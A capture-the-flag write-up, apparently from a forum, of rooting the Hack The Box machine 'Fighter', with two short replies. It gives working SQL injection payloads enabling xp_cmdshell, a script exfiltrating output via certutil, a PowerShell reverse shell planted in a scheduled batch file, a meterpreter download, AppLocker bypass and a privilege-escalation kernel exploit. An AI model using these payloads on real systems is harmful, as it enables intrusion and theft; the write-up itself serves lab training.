Fighter write-up, by 0xEA31

Fighter is (or, if you prefer, was) a tough machine. Interesting enough, even if it is tagged insane, it can be rooted at least in three ways: one performing a lateral movement to the fighter\decoder user and two directly from fighter\sqlserv user. Here I’ll show you how to get the root flag directly from fighter\sqlsrv user with Metasploit (!) and with Juicy Potato. If you wonder what Juicy Potato is, check decorder’s blog right now or… follow this writeup!

Lesson learned

  • Asp session cookie change name and value at each restart
  • use dir /ah to display hidden files
  • how to modify a metasploit module on the fly
  • how to run an exe file without extension and with any extension you like

Nmap fast

# Nmap 7.70 scan initiated Sat May  5 21:01:04 2018 as: nmap -vvv -T4 -oA nmap/fast 10.10.10.72
Nmap scan report for 10.10.10.72
Host is up, received echo-reply ttl 127 (0.10s latency).
Scanned at 2018-05-05 21:01:04 CEST for 8s
Not shown: 999 filtered ports
Reason: 999 no-responses
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat May  5 21:01:12 2018 -- 1 IP address (1 host up) scanned in 8.67 seconds

Nmap targeted

# Nmap 7.70 scan initiated Sat May  5 21:18:25 2018 as: nmap -sC -sV -oA nmap/80 -n -p80 10.10.10.72
Nmap scan report for 10.10.10.72
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  5 21:18:40 2018 -- 1 IP address (1 host up) scanned in 14.38 seconds

Sites

With Burp running in background we browse to 10.10.10.72, where we enter a Street Fighter fan site. Here, at the top post, we find:

  • a hint to “members” to use the “old” site,
  • a reference to streetfighterclub.htb.

Using the hint we can find by guess members.streetfighterclub.htb, and get a 403 error. (I suppose that the “right” way is to fuzz the 3rd level domain with a suitable tool…)
With gobuster, we can find the /old/ path (or maybe that we can do an educated guess if you are smarter than me). Please note the -f option to add the slash after the dir name and -s to add 403 to the “standard” response codes reported by gobuster:

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://members.streetfighterclub.htb/ -f -s 200,204,301,302,307,403 | tee gobuster.txt

gobuster

Since we are on gobuster, let’s use it to enumerate more. Not really needed, but it’s always better to be sure that “standard” things have been tried. Issue a

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://members.streetfighterclub.htb:80/old/ -x asp

and let it go for a long run while we continue. At the end it should output:

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://members.streetfighterclub.htb:80/old/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .asp
=====================================================
/login.asp (Status: 200)
/welcome.asp (Status: 302)
/Login.asp (Status: 200)
/Welcome.asp (Status: 302)
/verify.asp (Status: 302)
/Verify.asp (Status: 302)
/LogIn.asp (Status: 200)
/LOGIN.asp (Status: 200)
=====================================================

With or without gobuster, we should land to login.asp, an old-looking web login form that validates the credentials via /old/verify.asp:

sqlmap

We can manually try some basic SQLi on the parameters or we can use sqlmap, taking care to avoid some pitfalls kindly left on our path.

Since sqlmap has a known http-agent string, it may be filtered (and actually it’s filtered on Fighter). Other issues arise with the session cookie (ASPSESSIONID????????) that MUST be a valid one. The better thing to do to get this problem around is to save a legit request (but not the first one since it has no session cookie) from Burp and ask sqlmap to use it:

cat verity.req
POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Cookie: Email=; Level=%2D1; Chk=2941; password=YQ%3D%3D; username=YQ%3D%3D; ASPSESSIONIDAQABTRDR=NHGMECECCAOMLCPFAPNJKDCO
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

username=a&password=a&logintype=2&rememberme=ON&B1=LogIn
sqlmap -r verify.req --level 4 --risk 3

This command takes really a lot of time to get something out of the box. If you want to be faster, a more targeted command is:

sqlmap -r verify.req --level 4 --risk 3 --technique=B -p logintype --flush-session

Output

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:04:01

[23:04:01] [INFO] parsing HTTP request from 'verify_test.req'
[23:04:02] [INFO] flushing session file
[23:04:02] [INFO] testing connection to the target URL
[23:04:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://members.streetfighterclub.htb:80/old/Welcome.asp'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[23:04:08] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[23:04:09] [INFO] testing if the target URL content is stable
[23:04:09] [WARNING] heuristic (basic) test shows that POST parameter 'logintype' might not be injectable
[23:04:09] [INFO] testing for SQL injection on POST parameter 'logintype'
[23:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:04:19] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:04:20] [INFO] POST parameter 'logintype' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[23:04:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server' 
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (4) value? [Y/n] y
[23:04:31] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[23:04:31] [INFO] checking if the injection point on POST parameter 'logintype' is a false positive
POST parameter 'logintype' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 117 HTTP(s) requests:
---
Parameter: logintype (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=a&password=a&logintype=-2349 OR 3286=3286&rememberme=ON&B1=LogIn
---
[23:04:37] [INFO] testing Microsoft SQL Server
[23:04:37] [INFO] confirming Microsoft SQL Server
[23:04:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[23:04:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 92 times
[23:04:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/members.streetfighterclub.htb'

[*] shutting down at 23:04:39

Please note that different answers to the various questions may lead to different findings. For instance, if we answer “no” when asked wheather to follow or not a 302 redirect, we get a different dbms identification:

[...]
[23:39:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft Access
[...]

Verify the blind SQLi

sqlmap is awesome but sometimes over complicates things. Let’s check this blind SQLi manually;

curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=0+or+1=1+--;&B1=LogIn"
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Welcome.asp">here</a>.</body>
root@HTB:~/Documents/Fighter_72/httpserver#

yes, it works!

Get something out of the Blind SQLi

Getting something out of the box with a Blind SQLi is really hard because it is actually blind and because of some not-so-basic filtering done in the source code (we will see it). First things first, with some anti-WAF tricks (uppercase some letters), we can try to get a ping back:

curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=2;EXEC+Xp_cmdshell+'ping+10.10.14.44';&B1=LogIn"

if the output is something like this…

tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:55:27.721727 IP 10.10.10.72 > 10.10.14.44: ICMP echo request, id 1, seq 65, length 40
23:55:27.721775 IP 10.10.14.44 > 10.10.10.72: ICMP echo reply, id 1, seq 65, length 40
23:55:28.729634 IP 10.10.10.72 > 10.10.14.44: ICMP echo request, id 1, seq 66, length 40
23:55:28.729682 IP 10.10.14.44 > 10.10.10.72: ICMP echo reply, id 1, seq 66, length 40
[...]

we have a confirmed RCE. If it doesn’t maybe that xp_cmdshell is disabled. We can enable it with:

curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=64738;EXEC+sp_configure+'show+advanced+options',1;EXEC+sp_configure+'Xp_cmdshell',1;RECONFIGURE;+--';&B1=LogIn"

and we can also disable it, if we want:

curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=64738;EXEC+sp_configure+'show+advanced+options',1;EXEC+sp_configure+'Xp_cmdshell',0;RECONFIGURE;+--';&B1=LogIn"

From blind RCE to shell

There are different ways of getting something more useful from our SQLi. For instance we can issue SQL commands that (1)create a table, (2) fill it with some output and (3) ask sqlmap to dump that table, but it is slow and error prone so, as usual, long story short: google (MSSQL RCE) is our friend and kindly suggest us to read Red Team Tales 0x01: From MSSQL SQL Injection to RCE and Reverse MSSQL shell · GitHub where we find mandros.py. Let’s customize it:

[...]
query_id   = 0
target_url = "http://members.streetfighterclub.htb/old/verify.asp"
local_url  = "http://10.10.14.44:443/"
local_port = 443
[...]
'''
Create payload and send command: adapt this function to your needs
'''
def send_command(cmd):
    global target_url, local_url

    payload  = "2;"
    payload += "declare @r varchar(6120),@cmdOutput varchar(6120);"
    payload += "declare @res TABLE(line varchar(max));"
    payload += "insert into @res exec Xp_cmdshell '%s';"
    payload += "set @cmdOutput=(SELECT CAST((select stuff((select cast(char(10) as varchar(max)) + line FROM @res for xml path('')), 1, 1, '')) as varbinary(max)) FOR XML PATH(''), BINARY BASE64);"
    payload += "set @r=concat('certutil -urlcache -f %s',@cmdOutput);"
    payload += "exec Xp_cmdshell @r;"
    payload += "--"

    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    h = {'User-Agent':user_agent}
    
    # Customize from here
    p = {
          'username':'a',
          'password':'a',
          'logintype':payload % (cmd, local_url)
        }

    requests.post(target_url, headers=h, data=p)

'''
[...]

So we can use python ./mandros.py to get an almost working shell as fighter\sqlserv.

User flag

Since we are fighter\sqlserv, we cannot directly type the flag:

:\> icacls c:\users\decoder\desktop
C:\USERS\DECODER\DESKTOP: Access is denied.

but we can explore the box and find one file…

:\> icacls C:\USERS\DECODER\clean.bat
C:\USERS\DECODER\CLEAN.BAT Everyone:(M)
         NT AUTHORITY\SYSTEM:(I)(F)
         FIGHTER\decoder:(I)(F)
         BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files

…that stands out of the others, because we (Everyone) can modify (M) it.

:\> icacls c:\scripts\*

C:\SCRIPTS\largebackup.ps1 BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
C:\SCRIPTS\powerup.bat BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
C:\SCRIPTS\sherlock.bat BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
C:\SCRIPTS\sherlock.ps1 BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
C:\SCRIPTS\t.bat BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
Successfully processed 5 files; Failed processing 0 files

Of course we can read this file. This is the content, at the moment (fortunately unfortunately when the machine was released the content was different, presumably forgotten by a tester and HTB team patched it some days after the release):

type c:\users\decoder\clean.bat
@echo off 
del /q /s c:\users\decoder\appdata\local\TEMP\*.tmp 
exit

Since we cannot dir c:\users\decoder\appdata\local\TEMP\ (we get an Access is denied error if we try) we should do an educated guess: if this script has a meaning in the box, it is somehow executed by a user that has access permission on that folder (for instance by a scheduled task or something like that, issued as fighter\decoder).

To test this assumption, we need to change the content of the file. But we can only modify it:

:\> echo exit > c:\users\decoder\clean.bat
Access is denied.
:\> echo exit >> c:\users\decoder\clean.bat
:\> type c:\users\decoder\clean.bat
@echo off 
del /q /s c:\users\decoder\appdata\local\TEMP\*.tmp 
exit
EXIT 

Please note that the first exit command is the problem. Without it, a simple append would have been enough. But since exit is there we must get rid of it. Again, google is our friend: “windows command line truncate file” gives us windows - Resize a File in Command Prompt? - Super User, that is to say:

copy /y NUL c:\users\decoder\clean.bat

will truncate the file (and get rid of the exit). After that we can issue:

echo powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.14.44'',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data | Out-String );$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" >> c:\users\decoder\clean.bat

and wait to get a shell on our local nc -lnvp 80, where we can get our flag:

PS C:\> whoami
fighter\decoder
PS C:\> type c:\users\decoder\desktop\user.txt
bb6163c184f203af2a31a9**********

Administrator flag without relaying on decoder user

With a fighter\decoder shell we can explore the box. Long story short, the box is vulnerable to Windows Capcom.sys Kernel Execution Exploit (x64 only). Knowing the exploit, it’s quite clear why the creators choose Streetfighter V as the theme of the box (according to Wikipedia Street Fighter V is a fighting video game developed by Capcom and Dimps), but how we can get that Capcom.sys is what we need to pay attention to? A possible answer is driverquery /v which outputs:

#some columns have been removed
Module Name  Display Name           Driver Type    State       Link Date              Path                                             Init(bytes)
============ ====================== =============  ==========  ====================== ================================================ ===========
[...]
bxfcoe       Broadcom NetXtreme II  Kernel         Running     04/02/2013 22:38:12    C:\Windows\system32\drivers\bxfcoe.sys           4.096      
bxois        Broadcom NetXtreme II  Kernel         Running     04/02/2013 22:40:01    C:\Windows\system32\drivers\bxois.sys            4.096      
Capcom       Capcom                 Kernel         Running     05/09/2016 08:43:33    \??\C:\Windows\drivers\Capcom.sys                384        
Cbafilt      Cbafilt                File System    Running     22/08/2013 13:39:31    C:\Windows\system32\drivers\cbafilt.sys          4.096      
cdfs         CD/DVD File System Rea File System    Stopped     22/08/2013 13:40:15    C:\Windows\system32\DRIVERS\cdfs.sys             8.192      
[...]
wtlmdrv      Microsoft iSCSI Target Kernel         Stopped     22/08/2013 13:39:19    C:\Windows\system32\drivers\wtlmdrv.sys          4.096      
WudfPf       User Mode Driver Frame Kernel         Stopped     29/10/2014 03:46:27    C:\Windows\system32\drivers\WudfPf.sys           4.096      
MpKsld802f98 MpKsld802f98b          Kernel         Running     28/02/1989 02:54:41    \??\c:\ProgramData\Microsoft\Microsoft Anti[...] 4.096

As we can see two drivers have a different path:

\??\C:\Windows\drivers\Capcom.sys
\??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{FC2F2842-A0CC-4E0E-A511-A0BFEF9613FB}\MpKsld802f98b.sys

Asking google about both of them, makes clear that Capcom.sys is our main suspect and… there is a metasploit module also! Quite uncommon for an insane decoder box… So we can plot a strategy: we may try to upload meterpreter to the box, change the exploit/windows/local/capcom_sys_exec in order to make it works on a windows server 2012 R2 and use it.

But since it is a kernel exploit we don’t really need to escalate to fighter\decoder. If we can upload and execute meterpreter on the box we should be able to own it.

Bypass antivirus, Applocker, Fsrm & co.

Since it is a insane decoder Windows box, we have to deal with some “standard” protections and limitations: Meterpreter is usually intercepted by antiviruses and, while trying to get the initial foothold to the box, we should have already found that we cannot write .exe .bat .com & co. files. These limitation can be done with Applock, FSRM and so on. But… we can still create (and write), even as fighter\sqlserv, files with no extension (or other extensions, as .txt for example) in the %temp% folder:

echo test > %temp%\temp.bat
access denied
echo test > %temp%\temp
type %temp%\temp
test

So let’s try to upload a meterpreter with no extension, using curl and certutil as fighter\sqlserv:

# on the 1st terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.44 LPORT=80 -f exe > M_RS_80
python -m SimpleHTTPServer 80
# and on a 2nd terminal
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=2;EXEC+Xp_cmdshell+'certutil+-urlcache+-f+http://10.10.14.44/M_RS_80+C:\Users\sqlserv\AppData\Local\Temp\m_rs_80';&B1=LogIn"
#stop SimpleHTTPServer 80 on the 1st terminal
# setup meterpreter on a 3rd terminal
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 80
run -j

[*] Exploit running as background job 0.

With python ./mandros.py we chan check that the file is there:

dir %temp%

Volume in drive C has no label.
 Volume Serial Number is BE85-B9AE
 Directory of C:\Users\sqlserv\AppData\Local\Temp
19/05/2018  15:08    <DIR>          .
19/05/2018  15:08    <DIR>          ..
28/10/2017  17:36               175 InstallUtil.InstallLog
19/05/2018  15:08            73.802 M_RS_80
05/11/2017  05:41             5.316 web.config
               3 File(s)         79.393 bytes
               2 Dir(s)  23.740.166.144 bytes free

and also start it! Yes, even if it has no extension we can execute it: windows - How to run an executable file without the EXE extension using a CMD script? - Super User

#start meterpreter (no extension)
%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "Start-Process -FilePath C:\Users\sqlserv\AppData\Local\Temp\M_RS_80 -Wait -NoNewWindow"

# metasploit
[*] Started reverse TCP handler on 10.10.14.44:80 
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 10.10.10.72
[*] Meterpreter session 1 opened (10.10.14.44:80 -> 10.10.10.72:50304) at 2018-05-19 15:12:39 +0200

sessions

Active sessions
===============

  Id  Name  Type   Information                Connection
  --  ----  ----   -----------                ----------
  1         meterpreter x86/windows  FIGHTER\sqlserv @ FIGHTER  10.10.14.44:80 -> 10.10.10.72:49290 (10.10.10.72)

sessions -i 1

meterpreter > getuid
Server username: FIGHTER\sqlserv

meterpreter > sysinfo
Computer        : FIGHTER
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : it_IT
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Once we bypassed the antivirus and any protection on the extensions we can migrate to a 64bit process:

meterpreter > ps

Process List
============

 PID   PPID  Name   Arch  Session  User             Path
 ---   ----  ----   ----  -------  ----             ----
[....]
 1144  1132  conhost.exe
 1152  500   sqlservr.exe             x64   0        FIGHTER\sqlserv  C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
 1236  1764  powershell.exe           x86   0        FIGHTER\sqlserv  C:\Windows\SYSWOW64\WINDOWSPOWERSHELL\V1.0\powershell.exe
 1304  500   sqlwriter.exe
[....]

meterpreter > migrate 1152
[*] Migrating from 2924 to 1152...
[*] Migration completed successfully.

# background the sessions (ctrl+z)

search capcom
Matching Modules
================

   Name                 Disclosure Date  Rank    Description
   ----                 ---------------  ----    -----------
   exploit/windows/local/capcom_sys_exec  1999-01-01       normal  Windows Capcom.sys Kernel Execution Exploit (x64 only)
apcom.sys

Modify the Metasploit exploit to get SYSTEM

As we have seen, the box is a Windows Server 2012 R2 so we need to comment out version checking on the Metasploit module in order to get system:

locate capcom_sys_exec
vi /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb

  def check
    #if sysinfo['OS'] !~ /windows (7|8|10)/i
    #  return Exploit::CheckCode::Unknown
    #end

# back to msfconsole

use exploit/windows/local/capcom_sys_exec
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 443
set SESSION 1

reload
[*] Reloading module...
run 
[*] Started reverse TCP handler on 10.10.14.44:443 
[*] Launching notepad to host the exploit...
[+] Process 3976 launched.
[*] Reflectively injecting the exploit DLL into 3976...
[*] Injecting exploit into 3976...
[*] Exploit injected. Injecting payload into 3976...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 10.10.10.72
[*] Meterpreter session 2 opened (10.10.14.44:443 -> 10.10.10.72:50316) at 2018-05-19 15:16:25 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > cd c:/users/administrator/desktop
meterpreter > dir
Listing: c:\users\administrator\desktop
=======================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  9216      fil   2017-10-24 17:02:29 +0200  checkdll.dll
100666/rw-rw-rw-  282       fil   2017-10-20 13:24:57 +0200  desktop.ini
100777/rwxrwxrwx  9728      fil   2018-01-08 22:34:39 +0100  root.exe
100777/rwxrwxrwx  13767776  fil   2017-10-24 21:06:32 +0200  vc_redist.x86.exe

meterpreter > shell
Process 2232 created.
Channel 3 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\users\administrator\desktop>root.exe
root.exe
root.exe <password>
c:\users\administrator\desktop>exit

meterpreter > download root.exe
[*] Downloading: root.exe -> root.exe
[*] Downloaded 9.50 KiB of 9.50 KiB (100.0%): root.exe -> root.exe
[*] download   : root.exe -> root.exe
meterpreter > download checkdll.dll
[*] Downloading: checkdll.dll -> checkdll.dll
[*] Downloaded 9.00 KiB of 9.00 KiB (100.0%): checkdll.dll -> checkdll.dll
[*] download   : checkdll.dll -> checkdll.dll

Reverse engineering root.exe and check.dll

After dowloading these files, we can use radare2 or IDA Free to understand what’s going on. With IDA Free is really a matter of minutes to open check.dll and find this peace of cake code:

loc_10001010:
mov     cl, byte ptr ds:aFmFeholH[edx+eax] ; "Fm`fEhOl}h"
xor     cl, 9
cmp     cl, byte ptr ds:aFmFeholH[eax] ; "Fm`fEhOl}h"
jnz     short loc_1000102F

that is to say “please xor each byte in Fm``fEhOl}h with 9” that outputs our beloved password: OdioLaFeta

So we can issue root.exe OdioLaFeta in c:\users\administrator\desktop and get the flag.

meterpreter > shell 
cd c:\users\admninistrator\desktop
dir
root.exe OdioLaFeta
d801c1e9bd9a02f8fb30d8**********

Bonuses

Want to add a brand new executable extension (also callable from a .bat)?

set PATHEXT=%PATHEXT%;.txt
set pathext

file.txt

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

And what about FSRM (FileServerResourceManager)?

powershell -nop -c "import-module FileServerResourceManager; Get-FsrmSetting"
powershell -nop -c "import-module FileServerResourceManager; Get-FsrmFileScreen | FL"

Active          : True
Description     : 
IncludeGroup    : {Executable Files}
MatchesTemplate : False
Notification    : {MSFT_FSRMAction}
Path            : C:\Users
Template        : Block Executable Files
PSComputerName  : 

Active          : False
Description     : 
IncludeGroup    : {pexe}
MatchesTemplate : False
Notification    : 
Path            : C:\Windows\Temp
Template        : 
PSComputerName  : 

Active          : True
Description     : 
IncludeGroup    : {Executable Files}
MatchesTemplate : True
Notification    : {MSFT_FSRMAction, MSFT_FSRMAction}
Path            : C:\ProgramData
Template        : Block Executable Files
PSComputerName  : 

[...]

powershell -nop -c "import-module FileServerResourceManager; (Get-FsrmFileGroup -name 'Executable Files').IncludePattern"

*.bat
*.cmd
*.com
*.cpl
*.exe
*.inf
*.js
*.jse
*.msh
*.msi
*.msp
*.ocx
*.pif
*.pl
*.ps1
*.scr
*.vb
*.vbs
*.wsf
*.wsh

powershell -nop -c "import-module FileServerResourceManager; (Get-FsrmFileGroup -name 'pexe').IncludePattern"
*.com
*.dll
*.exe

Still here? Here you are a precious gift

As I said there is (at least), another way to root the box. Fighter was not exploitable by any “normal” Rotten Potato derivatives. As far as I understand, it’s because the BITS service is disabled. But, when I finally had time to dig into Decoder’s Lonely Potato source code, a couple of months ago, I wondered if another DCOM service would have been exploitable in the same manner. And I asked Decoder.

Turned out that he was working, with his friend Ohpe, on a Potato on steroids version, that he named Juicy Potato, and released shortly after: Juicy Potato (abusing the golden privileges) – Decoder's Blog.

If you still have to try it, Fighter is the perfect place to practice with it! I used metasploit to get a shell as fighter\sqlserv, and used the PATHEXT trick to fire it with a suitable CLSID available on the box:

jp.batbat -t * -p test.batbat -l 7411 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -z

As result you get:

{8BC3F05E-D86B-11D0-A075-00C04FB68820};
NT AUTHORITY\SYSTEM

Nice, isn’t it?

nice on dude :slight_smile:

cannot make certutil work, either with burp or curl: 500 internal server error…

Nevermind, my python SimpleHTTPServer was weirdly misbehaving…